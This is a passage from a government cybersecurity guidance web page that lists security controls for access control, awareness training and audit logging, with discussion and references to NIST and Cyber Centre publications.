emergency, developer, and service accounts. Users who require administrative privileges on system accounts receive additional scrutiny by organizational personnel responsible for approving such accounts and privileged access. Types of accounts that organizations may prohibit due to increased risk include group, emergency, guest, anonymous, and temporary accounts.</p> <p>Organizations may choose to define access privileges or other attributes by account, type of account, or a combination of both. Other attributes required for authorizing access include restrictions on time-of-day, day-of-week, and point of origin. In defining other account attributes, organizations consider system requirements (e.g., system upgrades, scheduled maintenance) and mission and business requirements (e.g., time zone differences, remote access to facilitate travel requirements).</p> <p>Users who pose a significant security and/or privacy risk include individuals for whom reliable evidence indicates either the intention to use authorized access to the system to cause harm or that adversaries will cause harm through them. Close coordination among human resource managers, mission/business owners, system administrators, and legal staff is essential when disabling system accounts for high-risk individuals. Time periods for the notification of organizational personnel or roles may vary.</p> <p>Inactivity logout is behaviour- or policy-based and requires users to take physical action to log out when they are expecting inactivity longer than the defined period. Automatic enforcement of inactivity logout is addressed by <a href="#03-01-10">Device lock 03.01.10</a>.</p> <h5>References</h5> <p>Source controls: AC-02, AC-02(03), AC-02(05), AC-02(13)<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/managing-and-controlling-administrative-privileges-itsap10094">Cyber Centre Managing and controlling administrative privileges (ITSAP.10.094) </a></li> <li><a href="/en/guidance/how-protect-your-organization-insider-threats-itsap10003-0">Cyber Centre How to protect your organization from insider threats (ITSAP.10.003) </a></li> </ul></details><details><summary><h4 id="03-01-02">03.01.02 Access enforcement</h4> </summary><p>Enforce approved authorizations for logical access to specified information and system resources in accordance with applicable access control policies.</p> <h5>Discussion</h5> <p>Access control policies control access between active entities or subjects (i.e., users or system processes acting on behalf of users) and passive entities or objects (i.e., devices, files, records, and domains) in organizational systems. Types of system access include remote access and access to systems that communicate through external networks, such as the Internet. Access enforcement mechanisms can also be employed at the application and service levels to provide increased protection for specified information. This recognizes that the system can host many applications and services in support of mission and business functions. Access control policies are defined in Policy and procedures 03.15.01.</p> <h5>References</h5> <p>Source control: AC-03<br /> Supporting publications: <a href="/en/guidance/managing-and-controlling-administrative-privileges-itsap10094">Cyber Centre Managing and controlling administrative privileges (ITSAP.10.094)</a></p> </details><details><summary><h4 id="03-01-03">03.01.03 Information flow enforcement</h4> </summary><p>Enforce approved authorizations for controlling the flow of specified information within the system and between connected systems.</p> <h5>Discussion</h5> <p>Information flow control regulates where specified information can transit within a system and between systems (versus who can access the information) and without explicit regard to subsequent accesses to that information. Flow control restrictions include keeping specified information from being transmitted in the clear to the Internet, blocking outside traffic that claims to be from within the organization, restricting requests to the Internet that are not from the internal web proxy server, and limiting specified information transfers between organizations based on data structures and content.</p> <p>Organizations commonly use information flow control policies and enforcement mechanisms to control the flow of specified information between designated sources and destinations (e.g., networks, individuals, and devices) within systems and between interconnected systems. Flow control is based on characteristics of the information or the information path. Enforcement occurs in boundary protection devices (e.g., encrypted tunnels, routers, gateways, and firewalls) that use rule sets or establish configuration settings that restrict system services, provide a packet-filtering capability based on header information, or provide a message-filtering capability based on message content (e.g., implementing key word searches or using document characteristics). Organizations also consider the trustworthiness of filtering and inspection mechanisms (i.e., hardware, firmware, and software components) that are critical to information flow enforcement.</p> <p>Transferring specified information between organizations may require an agreement that specifies how the information flow is enforced (see <a href="#03-12-05">Information exchange 03.12.05</a>). Transferring specified information between systems that represent different security domains with different security policies introduces the risk that such transfers may violate one or more domain security policies. In such situations, information custodians provide guidance at designated policy enforcement points between interconnected systems. Organizations consider mandating specific architectural solutions when required to enforce specific security policies. Enforcement includes prohibiting specified information transfers between interconnected systems (i.e., allowing information access only), employing hardware mechanisms to enforce one-way information flows, and implementing trustworthy regrading mechanisms to reassign security attributes and security labels.</p> <h5>References</h5> <p>Source control: AC-04<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/baseline-security-requirements-network-security-zones-version-20-itsp80022">Cyber Centre Baseline Security Requirements for Network Security Zones (ITSP.80.022) </a></li> <li><a href="/en/guidance/it-media-sanitization-itsp40006">Cyber Centre <abbr title="information technology">IT</abbr> media sanitization (ITSP.40.006) </a></li> </ul></details><details><summary><h4 id="03-01-04">03.01.04 Separation of duties</h4> </summary><ol class="lst-upr-alph"><li>Identify the duties of individuals requiring separation.</li> <li>Define system access authorizations to support separation of duties.</li> </ol><h5>Discussion</h5> <p>Separation of duties addresses the potential for abuse of authorized privileges and reduces the risk of malicious activity without collusion. Separation of duties includes dividing mission functions and support functions among different individuals or roles, conducting system support functions with different individuals or roles (e.g., quality assurance, configuration management, system management, assessments, programming, and network security), and ensuring that personnel who administer access control functions do not also administer audit functions. Because separation of duty violations can span systems and application domains, organizations consider the entirety of their systems and system components when developing policies on separation of duties. This requirement is enforced by <a href="#03-01-02">Access enforcement 03.01.02</a>.</p> <h5>References</h5> <p>Source control: AC-05<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/162/upd2/final">NIST SP 800-162 Guide to Attribute Based Access Control (ABAC) Definition and Considerations </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/178/final">NIST SP 800-178 A Comparison of Attribute Based Access Control (ABAC) Standards for Data Service Applications: Extensible Access Control Markup Language (XACML) and Next Generation Access Control (NGAC) </a></li> </ul></details><details><summary><h4 id="03-01-05">03.01.05 Least privilege</h4> </summary><ol class="lst-upr-alph"><li>Allow only the authorized system access for users (or processes acting on behalf of users) that is necessary to accomplish assigned organizational tasks.</li> <li>Authorize access to [Assignment: organization-defined security functions] and [Assignment: organization-defined security-relevant information].</li> <li>Review the privileges assigned to roles or classes of users [Assignment: organization-defined frequency] to validate the need for such privileges.</li> <li>Reassign or remove privileges, as necessary.</li> </ol><h5>Discussion</h5> <p>Organizations employ the principle of least privilege for specific duties and authorized access for users and system processes. Least privilege is applied to the development, implementation, and operation of the system. Organizations consider creating additional processes, roles, and system accounts to achieve least privilege. Security functions include establishing system accounts and assigning privileges, installing software, configuring access authorizations, configuring settings for events to be audited, establishing vulnerability scanning parameters, establishing intrusion detection parameters, and managing audit information. Security-relevant information includes threat and vulnerability information, filtering rules for routers or firewalls, configuration parameters for security services, security architecture, cryptographic key management information, access control lists, and audit information.</p> <h5>References</h5> <p>Source controls: AC-06, AC-06(01), AC-06(07), AU-09(04)<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-01-06">03.01.06 Least privilege – privileged accounts</h4> </summary><ol class="lst-upr-alph"><li>Restrict privileged accounts on the system to [Assignment: organization-defined personnel or roles].</li> <li>Require that users (or roles) with privileged accounts use non-privileged accounts when accessing non-security functions or non-security information.</li> <li>Require any administrative or superuser actions to be performed from a physical workstation which is dedicated to those specific tasks and isolated from all other functions and networks, especially any form of Internet access.</li> </ol><h5>Discussion</h5> <p>Privileged accounts refer to accounts that are granted elevated privileges to access resources (including security functions or security-relevant information) that are otherwise restricted for non-privileged accounts. These accounts are typically described as system administrator or super-user accounts. For example, a privileged account is often required in order to perform privileged functions such as executing commands that could modify system behaviour. Restricting privileged accounts to specific personnel or roles prevents non-privileged users from accessing security functions or security-relevant information. Requiring the use of non-privileged accounts when accessing non-security functions or non-security information limits exposure when operating from within privileged accounts.</p> <p>A dedicated administration workstation (DAW) is typically comprised of a user terminal with a very small selection of software designed for interfacing with the target system. For the purpose of this control, workstation is meant as the system from which you are performing the administration, as opposed to the target system of administration.</p> <h5>References</h5> <p>Source controls: AC-06(02), AC-06(05), SI-400<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-01-07">03.01.07 Least privilege – privileged functions</h4> </summary><ol class="lst-upr-alph"><li>Prevent non-privileged users from executing privileged functions.</li> <li>Log the execution of privileged functions.</li> </ol><h5>Discussion</h5> <p>Privileged functions include establishing system accounts, performing system integrity checks, conducting patching operations, or administering cryptographic key management activities. Non-privileged users do not possess the authorizations to execute privileged functions. Bypassing intrusion detection and prevention mechanisms or malicious code protection mechanisms are examples of privileged functions that require protection from non-privileged users. This requirement represents a condition to be achieved by the definition of authorized privileges in <a href="#03-01-01">Account management 03.01.01</a> and privilege enforcement in <a href="#03-01-02">Access enforcement 03.01.02</a>.</p> <p>The misuse of privileged functions – whether intentionally or unintentionally by authorized users or by unauthorized external entities that have compromised system accounts – is a serious and ongoing concern that can have significant adverse impacts on organizations. Logging the use of privileged functions is one way to detect such misuse and mitigate the risks from advanced persistent threats and insider threats.</p> <h5>References</h5> <p>Source controls: AC-06(09), AC-06(10)<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-01-08">03.01.08 Unsuccessful logon attempts</h4> </summary><ol class="lst-upr-alph"><li>Limit the number of consecutive invalid logon attempts to [Assignment: organization-defined number] in [Assignment: organization-defined time period].</li> <li>Automatically [Selection (one or more): lock the account or node for an [Assignment: organization-defined time period]; lock the account or node until released by an administrator; delay next logon prompt; notify system administrator; take other action] when the maximum number of unsuccessful attempts is exceeded.</li> </ol><h5>Discussion</h5> <p>Due to the potential for denial of service, automatic system lockouts are, in most cases, temporary and automatically release after a predetermined period established by the organization (i.e., using a delay algorithm). Organizations may employ different delay algorithms for different system components based on the capabilities of the respective components. Responses to unsuccessful system logon attempts may be implemented at the system and application levels.</p> <p>Organization-defined actions that may be taken include prompting the user to answer a secret question in addition to the username and password, invoking a lockdown mode with limited user capabilities (instead of a full lockout), allowing users to only logon from specified Internet Protocol (IP) addresses, requiring a CAPTCHA to prevent automated attacks, or applying user profiles, such as location, time of day, IP address, device, or Media Access Control (MAC) address.</p> <h5>References</h5> <p>Source control: AC-07<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology Systems (ITSP.30.031) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/124/r2/final">NIST SP 800-124 Guidelines for Managing the Security of Mobile Devices in the Enterprise </a></li> </ul></details><details><summary><h4 id="03-01-09">03.01.09 System use notification</h4> </summary><p>Display a system use notification message with privacy and security notices consistent with applicable specified information rules before granting access to the system.</p> <h5>Discussion</h5> <p>System use notifications can be implemented using warning or banner messages. The messages are displayed before individuals log in to the system. System use notifications are used for access via logon interfaces with human users and are not required when human interfaces do not exist. Organizations consider whether a secondary use notification is needed to access applications or other system resources after the initial network logon. Posters or other printed materials may be used in lieu of an automated system message. This requirement is related to <a href="#03-15-03">Rules of behaviour 03.15.03</a>.</p> <h5>References</h5> <p>Source control: AC-08<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-01-10">03.01.10 Device lock</h4> </summary><ol class="lst-upr-alph"><li>Prevent access to the system by [Selection (one or more): initiating a device lock after [Assignment: organization-defined time period] of inactivity; requiring the user to initiate a device lock before leaving the system unattended].</li> <li>Retain the device lock until the user re-establishes access using established identification and authentication procedures.</li> <li>Conceal, via the device lock, information previously visible on the display with a publicly viewable image.</li> </ol><h5>Discussion</h5> <p>Device locks are temporary actions taken to prevent access to the system when users depart from the immediate vicinity of the system but do not want to log out because of the temporary nature of their absences. Device locks can be implemented at the operating system level or application level. User-initiated device locking is behaviour- or policy-based and requires users to take physical action to initiate the device lock. Device locks are not an acceptable substitute for logging out of the system (e.g., when organizations require users to log out at the end of workdays). Publicly viewable images can include static or dynamic images, such as patterns used with screen savers, photographic images, solid colors, a clock, a battery life indicator, or a blank screen with the caveat that specified information information is not displayed.</p> <h5>References</h5> <p>Source controls: AC-11, AC-11(01)<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-01-11">03.01.11 Session termination</h4> </summary><p>Terminate a user session automatically after [Assignment: organization-defined conditions or trigger events requiring session disconnect].</p> <h5>Discussion</h5> <p>This requirement addresses the termination of user-initiated logical sessions in contrast to the termination of network connections that are associated with communications sessions (i.e., disconnecting from the network) in <a href="file:///C|/Users/fcommiss/Documents/Working on/03-13-09">Network disconnect 03.13.09</a>. A logical session is initiated whenever a user (or processes acting on behalf of a user) accesses a system. Logical sessions can be terminated (and thus terminate user access) without terminating network sessions. Session termination ends all system processes associated with a user’s logical session except those processes that are created by the user (i.e., session owner) to continue after the session is terminated. Conditions or trigger events that require automatic session termination can include organization-defined periods of user inactivity, time-of-day restrictions on system use, and targeted responses to certain types of incidents.</p> <h5>References</h5> <p>Source control: AC-12<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-01-12">03.01.12 Remote access</h4> </summary><ol class="lst-upr-alph"><li>Establish usage restrictions, configuration requirements, and connection requirements for each type of allowable remote system access.</li> <li>Authorize each type of remote system access prior to establishing such connections.</li> <li>Route remote access to the system through authorized and managed access control points.</li> <li>Authorize remote execution of privileged commands and remote access to security-relevant information.</li> </ol><h5>Discussion</h5> <p>Remote access is access to systems (or processes acting on behalf of users) that communicate through external networks, such as the Internet. Monitoring and controlling remote access methods allows organizations to detect attacks and ensure compliance with remote access policies. Routing remote access through managed access control points enhances explicit control over such connections and reduces susceptibility to unauthorized access to the system, which could result in the unauthorized disclosure of specified information.</p> <p>Remote access to the system represents a significant potential vulnerability that can be exploited by adversaries. Restricting the execution of privileged commands and access to security-relevant information via remote access reduces the exposure of the organization and its susceptibility to threats by adversaries. A privileged command is a human-initiated command executed on a system that involves the control, monitoring, or administration of the system, including security functions and security-relevant information. Security-relevant information is information that can potentially impact the operation of security functions or the provision of security services in a manner that could result in failure to enforce the system security policy or maintain isolation of code and data. Privileged commands give individuals the ability to execute sensitive, security-critical, or security-relevant system functions.</p> <h5>References</h5> <p>Source controls: AC-17, AC-17(03), AC-17(04)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/46/r2/final">NIST SP 800-46 Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/77/r1/final">NIST SP 800-77 Guide to IPsec <abbr title="virtual private network">VPN</abbr>s</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/113/final">NIST SP 800-113 Guide to SSL <abbr title="virtual private network">VPN</abbr>s</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/114/r1/final">NIST SP 800-114 User’s Guide to Telework and Bring Your Own Device (BYOD) Security</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/121/r2/upd1/final">NIST SP 800-121 Guide to Bluetooth Security</a></li> </ul></details><h4 id="03-01-13">03.01.13 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-01-14">03.01.14 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-01-15">03.01.15 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-01-16">03.01.16 Wireless access</h4> </summary><ol class="lst-upr-alph"><li>Establish usage restrictions, configuration requirements, and connection requirements for each type of wireless access to the system</li> <li>Authorize each type of wireless access to the system prior to establishing such connections</li> <li>Disable, when not intended for use, wireless networking capabilities prior to issuance and deployment</li> <li>Protect wireless access to the system using authentication and encryption</li> </ol><h5>Discussion</h5> <p>Wireless networking capabilities represent a significant potential vulnerability that can be exploited by adversaries. Establishing usage restrictions, configuration requirements, and connection requirements for wireless access to the system provides criteria to support access authorization decisions. These restrictions and requirements reduce susceptibility to unauthorized system access through wireless technologies. Wireless networks use authentication protocols that provide credential protection and mutual authentication. Organizations authenticate individuals and devices to protect wireless access to the system. Special attention is given to the variety of devices with potential wireless access to the system, including small form factor mobile devices (e.g., smart phones, tablets, smart watches). Wireless networking capabilities that are embedded within system components represent a significant potential vulnerability that can be exploited by adversaries. Strong authentication of users and devices, strong encryption, and disabling wireless capabilities that are not needed for essential missions or business functions can reduce susceptibility to threats by adversaries involving wireless technologies.</p> <h5>References</h5> <p>Source controls: AC-18, AC-18(01), AC-18(03)<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/security-requirements-wireless-local-area-networks-itsg-41">Cyber Centre Security Requirements for Wireless Local Area Networks (ITSG-41) </a></li> <li><a href="/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Cyber Centre Guidance on Securely Configuring Network Protocols (ITSP.40.062) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/94/final">NIST SP 800-94 Guide to Intrusion Detection and Prevention Systems (IDPS) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/124/r2/final">NIST SP 800-124 Guidelines for Managing the Security of Mobile Devices in the Enterprise </a></li> </ul></details><h4 id="03-01-17">03.01.17 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-01-18">03.01.18 Access control for mobile devices</h4> </summary><ol class="lst-upr-alph"><li>Establish usage restrictions, configuration requirements, and connection requirements for mobile devices</li> <li>Authorize the connection of mobile devices to the system</li> <li>Implement full-device or container-based encryption to protect the confidentiality of specified information on mobile devices</li> </ol><h5>Discussion</h5> <p>A mobile device is a computing device that has a small form factor such that it can easily be carried by a single individual; is designed to operate without a physical connection; possesses local, non-removable, or removable data storage; and includes a self-contained power source. Mobile device functionality may also include voice communication capabilities, on-board sensors that allow the device to capture information, and/or built-in features for synchronizing local data with remote locations. Examples include smart phones, smart watches, and tablets. Mobile devices are typically associated with a single individual. The processing, storage, and transmission capabilities of mobile devices may be comparable to or a subset of notebook or desktop systems, depending on the nature and intended purpose of the device. The protection and control of mobile devices are behaviour- or policy-based and requires users to take physical action to protect and control such devices when outside of controlled areas. Controlled areas are spaces for which the organization provides physical or procedural controls to meet the requirements established for protecting specified information.</p> <p>Due to the large variety of mobile devices with different characteristics and capabilities, organizational restrictions may vary for the different classes or types of such devices. Usage restrictions, configuration requirements, and connection requirements for mobile devices include configuration management, device identification and authentication, implementing mandatory protective software, scanning devices for malicious code, updating virus protection software, scanning for critical software updates and patches, conducting primary operating system and possibly other software integrity checks, and disabling unnecessary hardware. On mobile devices, secure containers provide software-based data isolation designed to segment enterprise applications and information from personal apps and data. Containers may present multiple user interfaces, one of the most common being a mobile application that acts as a portal to a suite of business productivity apps, such as email, contacts, and calendar. Organizations can employ full-device encryption or container-based encryption to protect the confidentiality of specified information on mobile devices.</p> <h5>References</h5> <p>Source controls: AC-19, AC-19(05)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/46/r2/final">NIST SP 800-46 Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/124/r2/final">NIST SP 800-124 Guidelines for Managing the Security of Mobile Devices in the Enterprise </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/114/r1/final">NIST SP 800-114 User’s Guide to Telework and Bring Your Own Device (BYOD) Security </a></li> </ul></details><h4 id="03-01-19">03.01.19 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-01-20">03.01.20 Use of external systems</h4> </summary><ol class="lst-upr-alph"><li>Prohibit the use of external systems unless they are specifically authorized</li> <li>Establish the following terms, conditions, and security requirements to be satisfied on external systems prior to allowing use of or access to those systems by authorized individuals: [Assignment: organization-defined security requirements]</li> <li>Permit authorized individuals to use an external system to access the organization’s system or to process, store, or transmit specified information only after: <ol><li>verifying that the security requirements on the external system as specified in the organization’s system security and privacy plans have been satisfied</li> <li>retaining approved system connection or processing agreements with the organizational entities hosting the external systems</li> </ol></li> <li>Restrict the use of organization-controlled portable storage devices by authorized individuals on external systems</li> </ol><h5>Discussion</h5> <p>External systems are systems that are used by but are not part of the organization. These systems include personally owned systems, system components, or devices; privately owned computing and communication devices in commercial or public facilities; systems owned or controlled by non-federal organizations; and systems managed by contractors. Organizations have the option to prohibit the use of any type of external system or specified types of external systems, (e.g., prohibit the use of external systems that are not organization-owned). Terms and conditions are consistent with the trust relationships established with the entities that own, operate, or maintain external systems and include descriptions of shared responsibilities.</p> <p>Authorized individuals include organizational personnel, contractors, or other individuals with authorized access to the organizational system and over whom the organization has the authority to impose specific rules of behaviour regarding system access. Restrictions that organizations impose on authorized individuals may vary depending on the trust relationships between the organization and external entities. Organizations need assurance that the external systems satisfy the necessary security requirements so as not to compromise, damage, or harm the system. This requirement is related to <a href="#03-16-03">External system services 03.16.03</a>.</p> <h5>References</h5> <p>Source controls: AC-20, AC-20(01), AC-20(02)<br /> Supporting publications: None</p> </details><h4 id="03-01-21">03.01.21 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-01-22">03.01.22 Publicly accessible content</h4> </summary><ol class="lst-upr-alph"><li>Train authorized individuals to ensure that publicly accessible information does not contain specified information</li> <li>Review the content on publicly accessible systems for specified information periodically and remove such information, if discovered</li> </ol><h5>Discussion</h5> <p>In accordance with applicable laws, Orders in Council, directives, policies, regulations, standards, and guidelines, the public is not authorized to have access to non-public information, including specified information.</p> <h5>References</h5> <p>Source control: AC-22<br /> Supporting publications: None</p> </details></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h3 class="h2 mrgn-tp-lg" id="3-2">3.2 Awareness and training</h3> <p>The Awareness and training controls deal with the education of users with respect to the security of the system.</p> <!– <section> <h4>In this section</h4> <ul class="list-unstyled"> <li><a href="#03-02-01">03.02.01 Literacy training and awareness</a></li> <li><a href="#03-02-02">03.02.02 Role-based training</a></li> <li><a href="#03-02-03">03.02.03 Not allocated</a></li> </ul> </section> –> <details><summary><h4 id="03-02-01">03.02.01 Literacy training and awareness</h4> </summary><ol class="lst-upr-alph"><li>Provide security and privacy literacy training to system users: <ol><li>as part of initial training for new users and [Assignment: organization-defined frequency] thereafter</li> <li>when required by system changes or following [Assignment: organization-defined events]</li> <li>on recognizing and reporting indicators of insider threat, social engineering, and social mining</li> </ol></li> <li>Update security and privacy literacy training content [Assignment: organization-defined frequency] and following [Assignment: organization-defined events]</li> </ol><h5>Discussion</h5> <p>Organizations provide basic and advanced levels of security and privacy literacy training to system users (including managers, senior executives, system administrators, and contractors) and measures to test the knowledge level of users. Organizations determine the content of literacy training based on specific organizational requirements, the systems to which personnel have authorized access, and work environments (e.g., telework). The content includes an understanding of the need for security and the actions required of users to maintain security and to respond to incidents. The content also addresses the need for operations security and the handling of specified information.</p> <p>Security and privacy awareness techniques include displaying posters, offering supplies inscribed with security reminders, displaying logon screen messages, generating email advisories or notices from organizational officials, and conducting awareness events using podcasts, videos, and webinars. Security and privacy literacy training is conducted at a frequency consistent with applicable laws, directives, regulations, and policies. Updating literacy training content on a regular basis ensures that the content remains relevant. Events that may precipitate an update to literacy training content include assessment or audit findings, security incidents or breaches, or changes in applicable laws, Orders in Council, directives, regulations, policies, standards, and guidelines.</p> <p>Potential indicators and possible precursors of insider threats include behaviours such as inordinate, long-term job dissatisfaction; attempts to gain access to information that is not required for job performance; unexplained access to financial resources; sexual harassment or bullying of fellow employees; workplace violence; and other serious violations of the policies, procedures, rules, directives, or practices of organizations. Organizations may consider tailoring insider threat awareness topics to the role (e.g., training for managers may be focused on specific changes in the behaviour of team members, while training for employees may be focused on more general observations).</p> <p>Social engineering is an attempt to deceive an individual into revealing information or taking an action that can be used to breach, compromise, or otherwise adversely impact a system. Social engineering includes phishing, pretexting, impersonation, baiting, quid pro quo, threadjacking, social media exploitation, and tailgating. Social mining is an attempt to gather information about the organization that may be used to support future attacks. Security and privacy literacy training includes how to communicate employee and management concerns regarding potential indicators of insider threat and potential and actual instances of social engineering and data mining through appropriate organizational channels in accordance with established policies and procedures.</p> <h5>References</h5> <p>Source controls: AT-02, AT-02(02), AT-02(03)<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/offer-tailored-cyber-security-training-your-employees-itsap10093">Cyber Centre Offer tailored cyber security training to your employees (ITSAP.10.093) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/160/v2/r1/final">NIST SP 800-160-2 Developing Cyber-Resilient Systems: A Systems Security Engineering Approach </a></li> </ul></details><details><summary><h4 id="03-02-02">03.02.02 Role-based training</h4> </summary><ol class="lst-upr-alph"><li>Provide role-based security and privacy training to organizational personnel: <ol><li>before authorizing access to the system or specified information, before performing assigned duties, and [Assignment: organization-defined frequency] thereafter</li> <li>when required by system changes or following [Assignment: organization-defined events]</li> </ol></li> <li>Update role-based training content [Assignment: organization-defined frequency] and following [Assignment: organization-defined events]</li> </ol><h5>Discussion</h5> <p>Organizations determine the content and frequency of security and privacy training based on the assigned duties, roles, and responsibilities of individuals and the security and privacy requirements of the systems to which personnel have authorized access. In addition, organizations provide system developers, enterprise architects, security architects, privacy officers, software developers, systems integrators, acquisition/procurement officials, system and network administrators, personnel conducting configuration management and auditing activities, personnel performing independent verification and validation, security assessors, and personnel with access to system-level software with security-related technical training specifically tailored for their assigned duties.</p> <p>Comprehensive role-based training addresses management, operational, and technical roles and responsibilities that cover physical, personnel, and technical controls. Such training can include policies, procedures, tools, and artifacts for the security and privacy roles defined. Organizations also provide the training necessary for individuals to carry out their responsibilities related to operations and supply chain security within the context of organizational information security programs.</p> <h5>References</h5> <p>Source control: AT-03<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/161/r1/final">NIST SP 800-161 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/181/r1/final">NIST SP 800-181 Workforce Framework for Cybersecurity (NICE Framework) </a></li> </ul></details><h4 id="03-02-03">03.02.03 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> </section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h3 class="h2 mrgn-tp-lg" id="3-3">3.3 Audit and accountability</h3> <p>The Audit and accountability controls support the ability to collect, analyze, and store audit records associated with user operations performed within the system.</p> <!–<section> <h4>In this section</h4> <ul class="list-unstyled"> <li><a href="#03-03-01">03.03.01 Event logging</a></li> <li><a href="#03-03-02">03.03.02 Audit record content</a></li> <li><a href="#03-03-03">03.03.03 Audit record generation</a></li> <li><a href="#03-03-04">03.03.04 Response to audit logging process failures</a></li> <li><a href="#03-03-05">03.03.05 Audit record review, analysis, and reporting</a></li> <li><a href="#03-03-06">03.03.06 Audit record reduction and report generation</a></li> <li><a href="#03-03-07">03.03.07 Time stamps</a></li> <li><a href="#03-03-08">03.03.08 Protection of audit information</a></li> <li><a href="#03-03-09">03.03.09 Not allocated</a></li> </ul> </section>–> <details><summary><h4 id="03-03-01">03.03.01 Event logging</h4> </summary><ol class="lst-upr-alph"><li>Specify the following event types selected for logging within the system: [Assignment: organization-defined event types]</li> <li>Review and update the event types selected for logging [Assignment: organization-defined frequency]</li> </ol><h5>Discussion</h5> <p>An event is any observable occurrence in a system, including unlawful or unauthorized system activity. Organizations identify event types for which a logging functionality is needed. This includes events that are relevant to the security of systems, the privacy of individuals, and the environments in which those systems operate to meet specific and ongoing auditing needs. Event types can include password changes, the execution of privileged functions, failed logons or accesses related to systems, administrative privilege usage, or third-party credential usage. In determining event types that require logging, organizations consider the system monitoring and auditing that are appropriate for each of the security requirements. When defining event types, organizations consider the logging necessary to cover related events, such as the steps in distributed, transaction-based processes (e.g., processes that are distributed across multiple organizations) and actions that occur in service-oriented or cloud-based architectures.</p> <p>Monitoring and auditing requirements can be balanced with other system needs. For example, organizations may determine that systems must have the capability to log every file access, both successful and unsuccessful, but only activate that capability under specific circumstances due to the potential burden on system performance. The event types that are logged by organizations may change over time. Reviewing and updating the set of logged event types is necessary to ensure that the current set remains relevant.</p> <h5>References</h5> <p>Source control: AU-02<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/network-security-logging-monitoring-itsap80085">Cyber Centre Network security logging and monitoring (ITSAP.80.085) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/92/final">NIST SP 800-92 Guide to Computer Security Log Management </a></li> </ul></details><details><summary><h4 id="03-03-02">03.03.02 Audit record content</h4> </summary><ol class="lst-upr-alph"><li>Include the following content in audit records: <ol><li>what type of event occurred</li> <li>when the event occurred</li> <li>where the event occurred</li> <li>source of the event</li> <li>outcome of the event</li> <li>identity of individuals, subjects, objects, or entities associated with the event</li> </ol></li> <li>Provide additional information for audit records, as needed</li> </ol><h5>Discussion</h5> <p>Audit record content that may be necessary to support the auditing function includes time stamps, source and destination addresses, user or process identifiers, event descriptions, file names, and the access control or flow control rules that are invoked. Event outcomes can include indicators of event success or failure and event-specific results (e.g., the security state of the system after the event occurred). Detailed information that organizations may consider in audit records may include a full text recording of privileged commands or the individual identities of group account users.</p> <h5>References</h5> <p>Source controls: AU-03, AU-03(01)<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-03-03">03.03.03 Audit record generation</h4> </summary><ol class="lst-upr-alph"><li>Generate audit records for the selected event types and audit record content specified in <a href="#03-03-01">Event logging 03.03.01</a> and <a href="#03-03-02">Audit record content 03.03.02</a></li> <li>Retain audit records for a time period consistent with records retention policy</li> </ol><h5>Discussion</h5> <p>Audit records can be generated at various levels of abstraction, including at the packet level as information traverses the network. Selecting the appropriate level of abstraction is a critical aspect of an audit logging capability and can facilitate the identification of root causes to problems. The ability to add information generated in audit records is dependent on system functionality to configure the audit record content. Organizations may consider additional information in audit records, including the access control or flow control rules invoked and the individual identities of group account users. Organizations may also consider limiting additional audit record information to only information that is explicitly needed for audit requirements. If records generated for the audit process contain personal information that is not required for the audit process, that personal information should be removed or redacted prior to retention.</p> <p>If audit records rely on personal information and that information is used to make an administrative decision, the minimum retention standard is at least two years following the last time the personal information was used for an administrative purpose unless the individual consents to its 